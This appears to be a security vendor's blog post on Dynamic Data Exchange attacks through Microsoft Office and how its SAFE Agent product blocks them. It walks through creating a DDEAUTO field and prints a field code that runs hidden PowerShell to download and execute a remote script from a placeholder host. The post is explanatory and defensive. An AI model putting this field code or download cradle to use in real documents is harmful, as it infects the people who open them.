DDE Attacks: a new way to spread malware using a Microsoft feature
The Dynamic Data Exchange protocol (DDE) is a built-in Microsoft feature that allows applications to share and exchange data. Microsoft Office programs can use it to request data from another application.
For malicious purposes, this feature allows an attacker to craft a document that performs malicious actions without any exploit or macro.
This attack method has been reported to Microsoft. Microsoft responded that it is a feature working as designed, that no further action will be taken, and that it will be considered as a candidate fix for a future version.
Simple DDE implementation
In Insert tab, click on “Quick Parts” and “Field”.
Click OK to create a new Formula.
Right click on the new formula and choose Toggle Field Codes.
Then write the DDE command; in this example only calc.exe is executed.
{ DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" }
Then save the document, and open it.
When the document is opened, a pop-up is displayed to inform the user that external files might be loaded by the document.
If the user clicks Yes, a new pop-up is displayed to inform the user that cmd.exe will be executed.
If the user clicks Yes, calc.exe is started. A pop-up says that no data can be retrieved because the program doesn’t return data to the DDE protocol.
Cyberattack scenario
To understand how this infection method is critical, let’s see a real attack execution flow.
In this example, the DDE field starts a PowerShell command line; PowerShell downloads a script from a server and executes it:
{ DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://example.com/my_malware.ps1');powershell -e $e "}
When the document is opened, the user still needs to accept two pop-ups to start the attack. The PowerShell command line is then executed and downloads the file from the server hosting the final malware. The malware is executed by PowerShell, and it keeps running in the background even if Word or PowerShell is closed.
Here is the execution tree of the different processes:
This attack can also be carried out from Outlook, Excel, XML files, etc.
For more attack examples, check this link: https://twitter.com/i/moments/918126999738175489.
How SAFE Agent blocks DDE attacks
Like many Office-based attacks (macro, exploit, link to a program, etc.), this attack needs to execute an external program to infect the computer.
In order to block this type of attack, the SAFE Agent limits the access to external programs for all Office applications.
When Microsoft Word tries to start cmd.exe from the DDE command, the Agent denies the execution and the DDE attack is successfully blocked.